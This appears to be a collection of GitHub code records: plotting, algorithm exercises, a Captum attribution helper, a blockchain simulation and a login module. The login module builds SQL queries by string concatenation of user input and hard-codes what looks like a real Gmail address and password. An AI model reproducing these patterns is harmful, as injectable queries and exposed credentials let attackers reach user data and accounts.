(sec)')\nbx.yaxis.set_major_locator(MaxNLocator(integer=True))\nmatplotlib.rcParams['pdf.fonttype'] = 42\nmatplotlib.rcParams['ps.fonttype'] = 42\ntight_layout()\nsavefig('core/examples/results/closedloop.pdf', format='pdf', dpi=2400)\nshow()\n","repo_name":"Cafolkes/keedmd","sub_path":"core/examples/cart_pole.py","file_name":"cart_pole.py","file_ext":"py","file_size_in_byte":23256,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"43654560904","text":"def flipColumn(arr, col):\n n = len(arr)\n\n for i in range(n):\n if arr[i][col] == 1:\n arr[i][col] = 0\n else:\n arr[i][col] = 1\n\n\ndef solution(beginning, target):\n answer = float(\"inf\")\n rows = len(beginning)\n cols = len(beginning[0])\n\n flipped = []\n\t# 미리 원본 배열을 flip시켜서 저장\n for i in range(rows):\n flipped.append([])\n for j in range(cols):\n if beginning[i][j]:\n flipped[i].append(0)\n else:\n flipped[i].append(1)\n\n # and시킬 bitmask를 돌면서\n for unit in range(1 << rows):\n rowFlipped = []\n flipCnt = 0\n for i in range(rows):\n \t# 000, 010, 100... bitmask 생성\n comp = 1 << i\n\n # and한 값이 0이 아니면 해당 row 뒤집기\n if unit & comp:\n rowFlipped.append(flipped[i][:])\n flipCnt += 1\n # 해당 row 뒤집지 않기\n else:\n rowFlipped.append(beginning[i][:])\n \n # 열 뒤집기\n for j in range(cols):\n curCol = []\n targetCol = []\n\n for i in range(rows):\n curCol.append(rowFlipped[i][j])\n targetCol.append(target[i][j])\n\t\t\t\n # 현재 column과 target column이 다르면 뒤집기\n if curCol != targetCol:\n flipColumn(rowFlipped, j)\n flipCnt += 1\n\n\t\t# 결국 뒤집은 결과가 target과 같으면 뒤집은 횟수 갱신\n if rowFlipped == target:\n answer = min(answer, flipCnt)\n\n if answer == float(\"inf\"):\n answer = -1\n\n return answer","repo_name":"SeongJaeBae/algorithm","sub_path":"프로그래머스/lv3/131703. 2차원 동전 뒤집기/2차원 동전 뒤집기.py","file_name":"2차원 동전 뒤집기.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70194762348","text":"# push X: 정수 X를 스택에 넣는 연산이다.\n# pop: 스택에서 가장 위에 있는 정수를 빼고, 그 수를 출력한다. 만약 스택에 들어있는 정수가 없는 경우에는 -1을 출력한다.\n# size: 스택에 들어있는 정수의 개수를 출력한다.\n# empty: 스택이 비어있으면 1, 아니면 0을 출력한다.\n# top: 스택의 가장 위에 있는 정수를 출력한다. 만약 스택에 들어있는 정수가 없는 경우에는 -1을 출력한다.\n\ndef do(st, com):\n if com[0] == \"push\":\n st.append(com[1])\n elif com[0] == \"pop\":\n if st:\n print(st.pop())\n else:\n print(-1)\n elif com[0] == \"size\":\n print(len(st))\n elif com[0] == \"empty\":\n if st:\n print(0)\n else:\n print(1)\n elif com[0] == \"top\":\n if st:\n print(st[len(st) - 1])\n else:\n print(-1)\nn = int(input())\nst = []\nfor i in range(n):\n command = list(input().split())\n do(st, command)\n ","repo_name":"Eilhwan/algorithms","sub_path":"oldOnes/python/Stack.py","file_name":"Stack.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14239357179","text":"# -*- coding: utf-8 -*-\nfrom directory import directory\nglobal signmein\nimport sqlite3\nconnection = sqlite3.connect(\"mesburgers1.db\")\nglobal crsr\n\nfrom email.MIMEMultipart import MIMEMultipart\nfrom email.MIMEText import MIMEText\ncrsr = connection.cursor()\nclass signmeinpage(directory):\n def __init__(self,query_components):\n print(\"sign me in\",query_components[\"email\"])\n if query_components.get(\"email\"):\n print(\"data_string = query_components[\\\"email\\\"][0]\")\n data_string = query_components[\"email\"][0]\n print(\"crsr.execute(\\\"SELECT * FROM users where email = '\\\"+data_string+\\\"'\\\")\")\n crsr.execute(\"SELECT * FROM users where email = '\"+data_string+\"'\")\n mycontent=\"\"\n # store all the fetched data in the ans variable\n connection.commit()\n ans = crsr.fetchall()\n if len(ans) == 0:\n print(\"no user\")\n else:\n crsr.execute(\"SELECT * FROM users where email = '\"+data_string+\"'\")\n connection.commit()\n user = crsr.fetchall()\n user_number=user[0][0]\n print(\"envoyer le code bk\")\n print(user[0])\n print(user[0][0])\n self.set_userid(user[0][0])\n bkcode=rand.randint(100000,999999)\n crsr.execute(\"UPDATE users SET code = '\" + str(bkcode) + \"' WHERE email = '\"+data_string+\"'\")\n connection.commit()\n\n\n # Configuration SMTP | Ici ajusté pour fonctionné avec Gmail\n host_smtp = \"smtp.gmail.com\"\n port_smtp = 587\n email_smtp = \"mary.goudon@gmail.com\" # Mon email Gmail\n mdp_smtp = \"eljlkuznppklsquw\" # Mon mot de passe\n\n # Configuration du mail\n prenom = \"cleo jeanne\"\n print(prenom)\n print(\"prenom\")\n mail_content = force_to_unicode(\"Prêt pour les hamburgers ? !\\nVous trouverez ci-dessous le code de connexion sécurisé que vous avez demandé pour vous connecter à Burger King. Entrez simplement ceci dans l'application et nous vous connecterons immédiatement.\\n \") + force_to_unicode(str(bkcode))\n print(\"mail_content\")\n email_destinataire = \"cleo.ordioni@gmail.com\"\n print(email_destinataire)\n formule_p = force_to_unicode(str(bkcode))+\" est votre code de connexion de burger king\"\n print(formule_p)\n msg = MIMEMultipart()\n print(\"from\")\n msg['From'] = email_smtp\n print(\"to\")\n msg['To'] = email_destinataire\n print(\"subject\")\n msg['Subject'] = formule_p\n print(\"formule\")\n try:\n msg.attach(MIMEText(mail_content.decode('utf-8')))\n except UnicodeEncodeError as e:\n print(type(e))\n print('gerer cette erreur')\n msg.attach(MIMEText(mail_content.encode('utf-8')))\n except UnicodeDecodeError as e:\n print(type(e))\n print('gerer cette erreur')\n msg.attach(MIMEText(mail_content))\n print(\"creation mail\")\n # Création de l'objet mail\n mail = smtplib.SMTP(host_smtp, port_smtp) # cette configuration fonctionne pour gmail\n mail.ehlo() # protocole pour SMTP étendu\n mail.starttls() # email crypté\n mail.login(email_smtp, mdp_smtp)\n mail.sendmail(email_smtp, email_destinataire, msg.as_string())\n mail.close()\n\n #confirmotp(force_to_unicode(data_string))\n self.set_redirect(\"/signinuser?user_number=\" + str(user_number)+\"&bkcode=\"+str(bkcode))\n\n self.set_json(None)\n self.set_mimetype(None)\n","repo_name":"maridasi47500/bk_python","sub_path":"signmein.py","file_name":"signmein.py","file_ext":"py","file_size_in_byte":3995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40172482343","text":"import torch\r\nimport torch.nn as nn\r\n\r\nimport os\r\nfrom PIL import Image\r\nfrom tqdm import tqdm\r\nimport numpy as np\r\nimport cv2\r\n\r\nimport pandas as pd\r\nfrom typing import Callable\r\n\r\nfrom .utils import split_str_into_tokens\r\n\r\nclass CaptumMagma(nn.Module):\r\n \"\"\"\r\n Wrapper to help with captum stuff\r\n \"\"\"\r\n def __init__(\r\n self,\r\n magma,\r\n mode= 'image',\r\n text_prompt = 'This is a picture of a',\r\n target_token_indices = [-1]\r\n ):\r\n super().__init__()\r\n\r\n self.valid_modes = ['image', 'text']\r\n assert mode in self.valid_modes, f'Expected mode: {mode} to be one of: {self.valid_modes}'\r\n self.mode = mode\r\n\r\n self.magma = magma\r\n self.text_prompt = text_prompt\r\n self.target_token_indices = target_token_indices\r\n\r\n def get_logits(self, embeddings, target_token_indices = None):\r\n if target_token_indices is None:\r\n target_token_indices = self.target_token_indices\r\n\r\n\r\n logits = self.magma.lm(\r\n inputs_embeds=embeddings,\r\n labels=None,\r\n output_hidden_states=False,\r\n ).logits\r\n\r\n return logits[:, target_token_indices,:] ## returns logits for completion tokens\r\n\r\n def embed_text(self, text):\r\n embeddings = self.magma.embed(\r\n [\r\n self.magma.tokenizer.encode(text, return_tensors = 'pt')\r\n ]\r\n )\r\n return embeddings\r\n\r\n def forward_image(self, image_tensor):\r\n\r\n ## if batch size is more than 1 (IntegratedGradients), then handle things differently\r\n if image_tensor.shape[0] > 1:\r\n embeddings = []\r\n\r\n for x in image_tensor:\r\n single_embedding_batch_item = self.magma.embed(\r\n [\r\n x.unsqueeze(0),\r\n self.magma.tokenizer.encode(self.text_prompt, return_tensors=\"pt\")\r\n ]\r\n )\r\n embeddings.append(single_embedding_batch_item)\r\n embeddings = torch.cat(embeddings, dim = 0)\r\n else:\r\n embeddings = self.magma.embed(\r\n [\r\n image_tensor,\r\n self.magma.tokenizer.encode(self.text_prompt, return_tensors=\"pt\")\r\n ]\r\n )\r\n\r\n logits = self.get_logits(embeddings = embeddings, target_token_indices = self.target_token_indices)\r\n # assert logits.shape[0] == 1, 'Expected batch size to be 1'\r\n # embeddings.shape: [1, seq, 4096]\r\n return logits[:,-1,:]\r\n\r\n def __call__(self, x):\r\n if self.mode == 'image':\r\n return self.forward_image(x)\r\n else:\r\n return self.get_logits(embeddings = x, target_token_indices = self.target_token_indices)[:,-1,:] ## return only last seq item i.e \"next token\"\r\n\r\n def load_image_as_tensor(self, filename):\r\n assert os.path.exists(filename), f'Expected image: {filename} to exist :('\r\n input_image_tensor = self.magma.transforms(Image.open(filename))\r\n\r\n return input_image_tensor\r\n\r\ndef collect_attributions_on_a_single_item_text(\r\n cmagma: CaptumMagma,\r\n captum_tool,\r\n target: str,\r\n prompt: str,\r\n device: str = 'cuda:0',\r\n is_integrated_gradients = True ## true by default for convenience\r\n ):\r\n\r\n target_token_strings = split_str_into_tokens(tokenizer = cmagma.magma.tokenizer, x = target)\r\n\r\n results = []\r\n\r\n for i in range(len(target_token_strings)):\r\n target_token_str = target_token_strings[i]\r\n target_tokenized = cmagma.magma.tokenizer.encode(target_token_str)\r\n\r\n if i > 0:\r\n prompt += target_token_strings[i-1]\r\n\r\n assert len(target_tokenized) == 1\r\n target_token_id = target_tokenized[0]\r\n\r\n embeddings = cmagma.embed_text(prompt).to(device)\r\n\r\n if is_integrated_gradients == True:\r\n attribution = captum_tool.attribute(embeddings, target=target_token_id, n_steps = 10)\r\n else:\r\n attribution = captum_tool.attribute(embeddings, target=target_token_id)\r\n\r\n data = {\r\n 'attribution': attribution,\r\n 'target_token_str':target_token_str,\r\n 'target_token_id': target_token_id\r\n }\r\n results.append(data)\r\n\r\n return results\r\n\r\ndef collect_attributions_on_a_single_item(\r\n image_path: str,\r\n cmagma: CaptumMagma,\r\n captum_tool,\r\n target: str,\r\n text_prompt = 'This is a picture of a',\r\n is_integrated_gradients = True ## true by default for convenience\r\n ):\r\n cmagma.text_prompt = text_prompt\r\n\r\n image_tensor = cmagma.load_image_as_tensor(image_path)\r\n\r\n target_token_strings = split_str_into_tokens(tokenizer = cmagma.magma.tokenizer, x = target)\r\n\r\n results = []\r\n\r\n for i in range(len(target_token_strings)):\r\n target_token_str = target_token_strings[i]\r\n target_tokenized = cmagma.magma.tokenizer.encode(target_token_str)\r\n\r\n if i > 0:\r\n cmagma.text_prompt += target_token_strings[i-1]\r\n\r\n assert len(target_tokenized) == 1\r\n target_token_id = target_tokenized[0]\r\n if is_integrated_gradients == True:\r\n attribution = captum_tool.attribute(image_tensor, target=target_token_id, n_steps = 10)\r\n else:\r\n attribution = captum_tool.attribute(image_tensor, target=target_token_id)\r\n\r\n data = {\r\n 'attribution': attribution,\r\n 'target_token_str':target_token_str,\r\n 'target_token_id': target_token_id\r\n }\r\n results.append(data)\r\n\r\n return results\r\n\r\n\r\ndef parse_results_over_all_tokens(results, square_outputs = True, divide_by_max = True):\r\n\r\n attributions = []\r\n\r\n for i in range(len(results)):\r\n attr = results[i]['attribution'].cpu().detach()[0].permute(1,2,0).mean(-1)\r\n if square_outputs is True:\r\n attr = attr**2\r\n if divide_by_max is True:\r\n attr = attr/attr.max()\r\n\r\n attributions.append(attr.numpy())\r\n\r\n return sum(attributions)/len(attributions)\r\n\r\n\r\ndef run_eval_with_captum_tool(\r\n cmagma,\r\n captum_tool,\r\n output_folder,\r\n metadata,\r\n dataloader,\r\n text_prompt=\"This is a picture of \", ## a or an is decided later\r\n use_lowercase_target=True,\r\n auto_decide_a_or_an=True,\r\n progress=False,\r\n square_outputs: bool = False,\r\n num_total_explanations=None,\r\n divide_by_max = False,\r\n is_integrated_gradients = True\r\n):\r\n\r\n if progress is True and num_total_explanations is not None:\r\n pbar = tqdm(total=num_total_explanations)\r\n\r\n \"\"\"\r\n ./result_folder\r\n - Cat\r\n - 1.jpg\r\n - 2.jpg\r\n - Dog\r\n - 1.jpg\r\n - 2.jpg\r\n \"\"\"\r\n\r\n ## append a space between last word and a/an\r\n if auto_decide_a_or_an == True:\r\n if text_prompt[-1] != \" \":\r\n text_prompt += \" \"\r\n\r\n classes = list(metadata.keys())\r\n\r\n d = dataloader\r\n\r\n if os.path.exists(output_folder) is False:\r\n print(f\"making output_folder: {output_folder}\")\r\n os.mkdir(output_folder)\r\n\r\n for i in range(len(classes)):\r\n output_class_dir = output_folder + \"/\" + classes[i]\r\n\r\n\r\n if os.path.exists(output_class_dir) is False:\r\n print(f\"making folder: {output_class_dir}\")\r\n os.mkdir(output_class_dir)\r\n\r\n\r\n for j in range(metadata[classes[i]][\"count\"]):\r\n\r\n filename = output_class_dir + f\"/{j+1}.npy\"\r\n\r\n if os.path.exists(filename):\r\n print(f\"{filename} already exists, skipping...\")\r\n if progress is True:\r\n pbar.update(1)\r\n continue\r\n\r\n try:\r\n data = d.fetch(i, j, center_crop=True, load_image = False)\r\n except:\r\n print(\r\n f\"an error occured while fetching from dataloader: class: {classes[i]} idx: {j+1}\"\r\n )\r\n if progress is True:\r\n pbar.update(1)\r\n continue\r\n\r\n\r\n if use_lowercase_target == True:\r\n target = f\" {data['label'].lower()}\"\r\n else:\r\n target = f\" {data['label']}\"\r\n\r\n results = collect_attributions_on_a_single_item(\r\n image_path = data['image_path'],\r\n cmagma = cmagma,\r\n captum_tool = captum_tool,\r\n target = target,\r\n text_prompt = text_prompt,\r\n is_integrated_gradients = is_integrated_gradients\r\n )\r\n\r\n ## heatmap_numpy is a numpy array with values between 0 and 1 if divide_by_max == True\r\n heatmap_numpy = parse_results_over_all_tokens(\r\n results = results,\r\n square_outputs=square_outputs,\r\n divide_by_max=divide_by_max\r\n )\r\n np.save(filename, heatmap_numpy)\r\n print(f'saved: {filename}')\r\n torch.cuda.empty_cache()\r\n if progress is True:\r\n pbar.update(1)\r\n\r\n if progress is True:\r\n pbar.close()\r\n print('complete!!')\r\n print(f'check:\\n{output_folder}')\r\n\r\n\r\ndef calculate_score_for_output_folder(\r\n output_folder: str,\r\n metadata,\r\n dataloader,\r\n output_csv_file: str,\r\n metric_fn: Callable,\r\n progress=True,\r\n num_total_explanations=None,\r\n mask_size = (384,384),\r\n):\r\n\r\n result_dict = {\r\n 'image_filename': [],\r\n 'mask_filename': [],\r\n 'explanation_filename': [],\r\n 'precision_score': [],\r\n 'label': [],\r\n }\r\n\r\n if progress is True and num_total_explanations is not None:\r\n pbar = tqdm(total=num_total_explanations)\r\n\r\n \"\"\"\r\n ./result_folder\r\n - Cat\r\n - 1.jpg\r\n - 2.jpg\r\n - Dog\r\n - 1.jpg\r\n - 2.jpg\r\n \"\"\"\r\n classes = list(metadata.keys())\r\n\r\n d = dataloader\r\n for i in range(len(classes)):\r\n output_class_dir = output_folder + \"/\" + classes[i]\r\n\r\n for j in range(metadata[classes[i]][\"count\"]):\r\n\r\n try:\r\n data = d.fetch(i, j, center_crop=True, load_image = False)\r\n except:\r\n print(\r\n f\"an error occured while fetching from dataloader: class: {classes[i]} idx: {j+1}\"\r\n )\r\n if progress is True:\r\n pbar.update(1)\r\n continue\r\n\r\n explanation_path = output_class_dir + f\"/{j+1}.npy\"\r\n mask_path = data['mask_path']\r\n image_path = data['image_path']\r\n\r\n assert os.path.exists(explanation_path), f'Expected explanation path: {explanation_path} to exist :('\r\n explanation = np.array(np.load(explanation_path))\r\n mask = np.array(Image.open(mask_path).resize(mask_size))/255.\r\n\r\n score = metric_fn(x= explanation, y=mask)\r\n\r\n result_dict['image_filename'].append(image_path)\r\n result_dict['mask_filename'].append(mask_path)\r\n result_dict['explanation_filename'].append(explanation_path)\r\n result_dict['precision_score'].append(score)\r\n result_dict['label'].append(data['label'])\r\n\r\n if progress is True:\r\n pbar.update(1)\r\n\r\n df = pd.DataFrame(result_dict)\r\n df.to_csv(output_csv_file)\r\n print(f'saved: {output_csv_file}')\r\n\r\n return df\r\n","repo_name":"Aleph-Alpha/AtMan","sub_path":"atman-magma/atman_magma/captum_helper.py","file_name":"captum_helper.py","file_ext":"py","file_size_in_byte":11513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1281124235","text":"#Morguhn Burke\r\n#mcb196\r\n#4/18/2022\r\n#CS-4379-D Assignment 4\r\n\r\n#This assignment was coded by me using python in Microsoft visual studio code.\r\n#It is an event based simulation making use of a linked list implimentation of a priority queue based on event arrival time (Node.py) (Line: 441)\r\n\r\n#This program generates events in two different stages, firstly, it determines if a new player/miner is to be added/removed\r\n#from the simulation based on a number created from a geometric distribtion of probability 0.1 (Line: 234, 365, 431) \r\n#Then, if the current event time has surpassed the previous time + the next time generated by geometric distribution, a player/miner will be added/removed\r\n\r\n#Following this, any active players (Defined in Players.py) will have transaction events generated (Deposit, withdrawl, Transfer, Hold) (Events.py)\r\n#After all the events are processed, they are assigned to the miner who's block they were assigned to in a Blockchain with a sha256 cryptographic has (BlockChain.py)\r\n\r\n\r\nimport time\r\nimport random\r\nimport csv\r\nimport pandas as pd\r\nimport numpy as np\r\nimport Players as P\r\nimport BlockChain as BC\r\nimport Node as N\r\nimport Events as ev\r\n\r\n\r\nplayerList = []\r\n\r\nclass Miner(P.Players):\r\n def __init__(self, name):\r\n self.name = name\r\n self.head = None\r\n self.role = \"Miner\"\r\n self.playersAdded = False\r\n self.numPlayersAdded = 0\r\n self.addedPlayers = []\r\n self.nodeData = []\r\n self.requestStatus = []\r\n self.blockChain = None\r\n self.chainDelta = 0\r\n \r\n def writeEvents(events, MasterPlayerList, MasterMinerList):\r\n #Name ActionCode PaymentMethod PaymentAmount (TransferTarget IF Transfer)\r\n newEventList = []\r\n for evt in events:\r\n try:\r\n player = evt.player\r\n event = \" \"\r\n if evt.actionCode == 9:\r\n print(\"Standard Error: \" + str(player.name) + \" was not assigned an action code. Player forced to Hold\")\r\n evt.actionCode = 3\r\n event = (str(player.name) + \" \" + str(evt.actionCode))\r\n elif evt.actionCode == 0: #Deposit Deposits go to E\r\n event = (str(player.name) + \" \" + str(evt.actionCode) + \" \" + str(evt.paymentMethod) + \" \" + str(evt.paymentAmt) + \" \" + str(evt.minerTarget) + \" \" + str(evt.arrivalTime))\r\n elif evt.actionCode == 1: #Withdrawl from E\r\n event = (str(player.name) + \" \" + str(evt.actionCode) + \" \" + str(evt.paymentMethod) + \" \" + str(evt.withdrawlAmt) + \" \" + str(evt.minerTarget)+ \" \" + str(evt.arrivalTime))\r\n elif evt.actionCode == 2: #Transfer funds to player\r\n event = (str(player.name) + \" \" + str(evt.actionCode) + \" \" + str(evt.paymentMethod) + \" \" + str(evt.transferAmt) + \" \" + str(evt.transferTarget)+ \" \" + str(evt.arrivalTime))\r\n\r\n newEventList.append(event)\r\n \r\n except AttributeError:\r\n None\r\n \r\n newEventList = list(filter((' ').__ne__, newEventList))\r\n newEventList = list(filter(('').__ne__, newEventList))\r\n \r\n return newEventList\r\n \r\n def removeDuplicates(input):\r\n res = []\r\n [res.append(x) for x in input if x not in res]\r\n return res\r\n \r\n def getCurrPlayer(name, playerList):\r\n for player in playerList:\r\n if name == player.name:\r\n currPlayer = player\r\n try: \r\n return currPlayer\r\n except UnboundLocalError:\r\n print(\"Event Error Occured, player: \" + str(name))\r\n return A\r\n \r\n def getMinerTarget(n, minerList):\r\n for miner in minerList:\r\n if miner.name == n:\r\n return miner\r\n \r\n return E\r\n \r\n def executeEvents(playerList, minerList, eventQueue):\r\n \r\n print(\"executing\")\r\n currEvent = eventQueue\r\n while currEvent.next != None:\r\n event = currEvent.data\r\n event = event.split(' ')\r\n if event[1] == '0':\r\n Miner.handleDeposit(currEvent, minerList)\r\n elif event[1] == '1':\r\n Miner.handleWithdrawl(currEvent, minerList)\r\n elif event[1] == '2':\r\n Miner.handleTransfer(currEvent, playerList)\r\n else:\r\n print(\"There was an unknown error with an event: \")\r\n print(event)\r\n currEvent = currEvent.next\r\n \r\n def handleDeposit(event, minerList):\r\n \r\n acceptedTransaction = True\r\n event = event.data\r\n event = event.split(' ')\r\n currPlayer = Miner.getCurrPlayer(event[0], playerList)\r\n paymentMethod = event[2]\r\n paymentAmt = int(event[3])\r\n currMiner = Miner.getMinerTarget(event[4], minerList)\r\n \r\n if paymentMethod == \"Account\":\r\n if currPlayer.acctBal - paymentAmt >= 0:\r\n string = \"Account Deposit approved from \" + str(currPlayer.name) + \" in the amount of: \" + str(paymentAmt)\r\n currPlayer.acctBal -= paymentAmt\r\n currPlayer.chainBalance += paymentAmt\r\n currPlayer.approvedCnt += 1\r\n currMiner.chainDelta += paymentAmt\r\n else:\r\n string = \"Account Deposit Denied from \" + str(currPlayer.name) + \" due to lack of funds\"\r\n acceptedTransaction = False\r\n currPlayer.deniedCnt += 1\r\n \r\n if paymentMethod == \"Credit\":\r\n if currPlayer.creditBalance + paymentAmt <= currPlayer.creditLimit:\r\n string = \"Credit Deposit approved from \" + str(currPlayer.name) + \" in the amount of: \" + str(paymentAmt)\r\n currPlayer.creditBalance -= paymentAmt\r\n currPlayer.chainBalance += paymentAmt\r\n currPlayer.approvedCnt += 1\r\n currMiner.chainDelta += paymentAmt\r\n \r\n else:\r\n string = \"Credit Deposit Denied from \" + str(currPlayer.name) + \" due to lack of funds\"\r\n acceptedTransaction = False\r\n currPlayer.deniedCnt += 1\r\n \r\n Miner.updateStatus(event, string, currMiner, acceptedTransaction)\r\n \r\n def handleWithdrawl(event, minerList):\r\n \r\n acceptedTransaction = True\r\n event = event.data\r\n event = event.split(' ')\r\n currPlayer = Miner.getCurrPlayer(event[0], playerList)\r\n paymentMethod = event[2]\r\n paymentAmt = int(event[3])\r\n currMiner = Miner.getMinerTarget(event[4], minerList)\r\n \r\n if paymentAmt == 0:\r\n string = \"Account Withdrawl Denied from \" + str(currPlayer.name) + \" due to lack of funds\"\r\n acceptedTransaction = False\r\n currPlayer.deniedCnt += 1\r\n else:\r\n if paymentMethod == \"Account\":\r\n if currPlayer.chainBalance - paymentAmt >= 0:\r\n string = \"Account Withdrawl approved from \" + str(currPlayer.name) + \" in the amount of: \" + str(paymentAmt)\r\n currPlayer.acctBal += paymentAmt\r\n currPlayer.approvedCnt += 1\r\n currPlayer.chainBalance -= paymentAmt\r\n currMiner.chainDelta -= paymentAmt\r\n else:\r\n string = \"Account Withdrawl Denied from \" + str(currPlayer.name) + \" due to lack of funds\"\r\n acceptedTransaction = False\r\n currPlayer.deniedCnt += 1\r\n \r\n if paymentMethod == \"Credit\":\r\n if currPlayer.chainBalance - paymentAmt >= 0:\r\n string = \"Credit Withdrawl approved from \" + str(currPlayer.name) + \" in the amount of: \" + str(paymentAmt)\r\n currPlayer.approvedCnt += 1\r\n currPlayer.chainBalance -= paymentAmt\r\n currMiner.chainDelta -= paymentAmt \r\n currPlayer.creditBalance -= paymentAmt\r\n if currPlayer.creditBalance< 0: #if credit balance goes negative, add the remainder to account\r\n leftovers = abs(currPlayer.creditBalance)\r\n currPlayer.creditBalance += leftovers\r\n currPlayer.acctBal += leftovers\r\n else:\r\n string = \"Account Withdrawl Denied from \" + str(currPlayer.name) + \" due to lack of funds\"\r\n acceptedTransaction = False\r\n currPlayer.deniedCnt += 1\r\n \r\n Miner.updateStatus(event, string, currMiner, acceptedTransaction)\r\n \r\n def handleTransfer(event, playerList):\r\n acceptedTransaction = True\r\n event = event.data\r\n event = event.split(' ')\r\n currPlayer = Miner.getCurrPlayer(event[0], playerList)\r\n paymentMethod = event[2]\r\n transferAmt = int(event[3])\r\n transferTarget = Miner.getCurrPlayer(event[4], playerList)\r\n \r\n if paymentMethod == \"Account\":\r\n if currPlayer.acctBal - transferAmt >= 0:\r\n string = \"Account Transfer Between \" + str(currPlayer.name) + \" and \" + str(transferTarget.name) + \" was Approved: \" + str(currPlayer.transferAmt)\r\n currPlayer.acctBal -= transferAmt\r\n transferTarget.acctBal += transferAmt\r\n currPlayer.approvedCnt += 1\r\n else:\r\n string = \"Account Transfer Between \" + str(currPlayer.name) + \" and \" + str(transferTarget.name) + \" was Denied\"\r\n acceptedTransaction = False\r\n currPlayer.deniedCnt += 1\r\n \r\n if paymentMethod == \"Credit\":\r\n if currPlayer.creditBalance + transferAmt <= currPlayer.creditLimit:\r\n string = \"Credit Transfer Between \" + str(currPlayer.name) + \" and \" + str(transferTarget.name) + \" was Approved: \" + str(transferAmt)\r\n currPlayer.creditBalance += transferAmt\r\n transferTarget.acctBal += transferAmt\r\n currPlayer.approvedCnt += 1\r\n else:\r\n string = \"Credit Transfer Between \" + str(currPlayer.name) + \" and \" + str(transferTarget.name) + \" was Denied\"\r\n acceptedTransaction = False\r\n currPlayer.deniedCnt += 1\r\n \r\n Miner.updateStatus(event, string, E, acceptedTransaction)\r\n \r\n def updateStatus(currEvent, string, currMiner, acceptedTransaction):\r\n if(acceptedTransaction):\r\n if currEvent not in currMiner.nodeData:\r\n currMiner.nodeData.append(currEvent)\r\n \r\n if string not in E.requestStatus:\r\n E.requestStatus.append(string) \r\n \r\n def getEventTime():\r\n time = np.random.geometric(p=0.1, size = 1)\r\n time = time/1000\r\n return time\r\n \r\n def getRole():\r\n role = np.random.choice([\"Player\", \"Miner\"], replace = False, p = [0.5, 0.5])\r\n return role\r\n \r\n def rollName(nameOptions):\r\n name = np.random.choice([\"F\", \"G\", \"H\", \"I\", \"J\", \"K\", \"L\", \"M\", \"N\", \"O\", \"P\", \"Q\", \"R\", \"S\", \"T\", \"U\", \"V\", \"W\", \"X\", \"Y\", \"Z\"])\r\n return name\r\n \r\n def pickPlayerToRemove():\r\n toRemove = random.choice(E.addedPlayers)\r\n\r\n return toRemove\r\n \r\n def removeFromList(player, playerList):\r\n for item in playerList:\r\n if player.name == item.name:\r\n playerList.remove(item)\r\n return playerList\r\n \r\n def getBlockClusterssss(miner):\r\n nodeData = miner.nodeData\r\n miner.nodeData = []\r\n cluster = []\r\n i = 0\r\n clusterSize = random.randint(1,6) #maximum of 6 items ber block\r\n while i < len(nodeData):\r\n if i == clusterSize:\r\n clusterSize += random.randint(1,7) #randint is uninclusive on upper bound\r\n miner.nodeData.append(cluster)\r\n cluster = []\r\n else:\r\n cluster.append(nodeData[i])\r\n i += 1\r\n \r\n def getBlockClusters(miner):\r\n nodeData = miner.nodeData\r\n miner.nodeData = []\r\n cluster = []\r\n addedToCluster = []\r\n skipped = []\r\n i = 0\r\n clusterSize = random.randint(1,7) #maximum of 6 items ber block\r\n while i < len(nodeData):\r\n if i == clusterSize:\r\n clusterSize += random.randint(1,7) #randint is uninclusive on upper bound\r\n miner.nodeData.append(cluster)\r\n cluster = []\r\n addedToCluster = []\r\n else:\r\n if nodeData[i][0] not in addedToCluster:\r\n cluster.append(nodeData[i])\r\n addedToCluster.append(nodeData[i][0])\r\n else:\r\n skipped.append(nodeData[i])\r\n i += 1\r\n \r\n while len(skipped) > 0:\r\n i = 0\r\n if len(skipped) == 1:\r\n nodeData.append(skipped[0])\r\n skipped.pop(i)\r\n break\r\n clusterSize = random.randint(1,7)\r\n while i < len(skipped):\r\n if i == clusterSize:\r\n clusterSize += random.randint(1,7) #randint is uninclusive on upper bound\r\n miner.nodeData.append(cluster)\r\n cluster = []\r\n addedToCluster = []\r\n else:\r\n if str(nodeData[i][0]) not in addedToCluster:\r\n cluster.append(nodeData[i])\r\n addedToCluster.append(str(nodeData[i][0]))\r\n skipped.pop(i)\r\n else:\r\n None\r\n i += 1\r\n \r\n#################################################################\r\n\r\ndef getStatistics(MasterPlayerList, elapsedTime):\r\n totalEvents = 0\r\n approvedEvents =0\r\n deniedEvents = 0\r\n \r\n for player in MasterPlayerList:\r\n approvedEvents += player.approvedCnt\r\n deniedEvents += player.deniedCnt\r\n totalEvents += (player.approvedCnt + player.deniedCnt)\r\n \r\n avgApproved = approvedEvents/totalEvents\r\n avgDenied = deniedEvents/totalEvents\r\n \r\n print(\"End Statistics:\")\r\n print(\"Total Events: \" + str(totalEvents))\r\n print(\"Number Approved Events: \" + str(approvedEvents))\r\n print(\"Number Denied Events: \" + str(deniedEvents))\r\n print(\"Average Events Approved: \" + str(round(100*avgApproved,2))+\"%\")\r\n print(\"Average Events Denied: \" + str(round(100*avgDenied,2))+\"%\")\r\n print(\"Total Events Per Second: \" + str(round(totalEvents/elapsedTime,2)))\r\n print(\"Approved Events Per Second: \" + str(round(approvedEvents/elapsedTime,2)))\r\n print(\"Denied Events Per Second: \" + str(round(deniedEvents/elapsedTime,2)))\r\n \r\n \r\n#Generate Events on timed loop, writing to file\r\ndef generateEvents(A, B, C, D, E):\r\n startTime = time.time()\r\n runTime = 5\r\n previousTime = 0\r\n \r\n eventQueue = None\r\n events = []\r\n \r\n global playerList\r\n playerList = [A, B, C, D]\r\n \r\n minerList = [E]\r\n MasterPlayerList = [A, B, C, D] #A list of all players that ever existed in the simulation NEVER removed from\r\n MasterMinerList = [E]\r\n nameOptions = ['F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\r\n\r\n print('Generating Events...')\r\n while True: #Timed Loop\r\n currTime = time.time()\r\n elapsed_time = currTime - startTime\r\n \r\n nextTime = 